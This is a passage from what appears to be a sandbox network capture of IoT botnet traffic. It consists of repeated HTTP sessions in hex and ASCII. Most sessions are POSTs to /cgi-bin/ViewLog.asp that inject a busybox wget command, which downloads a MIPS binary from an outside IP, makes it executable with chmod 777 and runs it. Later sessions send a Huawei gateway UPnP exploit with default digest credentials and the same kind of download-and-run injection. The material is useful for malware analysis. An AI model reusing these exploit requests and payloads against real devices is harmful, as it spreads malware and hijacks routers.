                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              269192.168.2.135906062.29.14.118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:21.826003075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              270192.168.2.133352085.99.131.1238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:21.841953039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              271192.168.2.135901431.200.40.2418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:21.897893906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              272192.168.2.135829694.120.155.728080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:21.898051023 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              273192.168.2.133716294.122.2.838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:21.908484936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              274192.168.2.133702694.122.123.768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:22.496604919 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              275192.168.2.134973494.130.226.248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:22.932768106 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:23.117538929 CET358INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:16:23 GMT
                                              Server: Apache
                                              Content-Length: 126
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                              Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              276192.168.2.133844031.136.125.1648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:22.934870005 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:23.526474953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:24.678572893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.174504042 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:31.782546043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:40.998514891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:00.454375982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:37.318322897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              277192.168.2.135187694.120.43.1338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:22.967468977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              278192.168.2.135018695.86.82.2178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:22.986753941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              279192.168.2.1355344156.254.69.2237215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:23.854901075 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:25.478477001 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:27.398458958 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 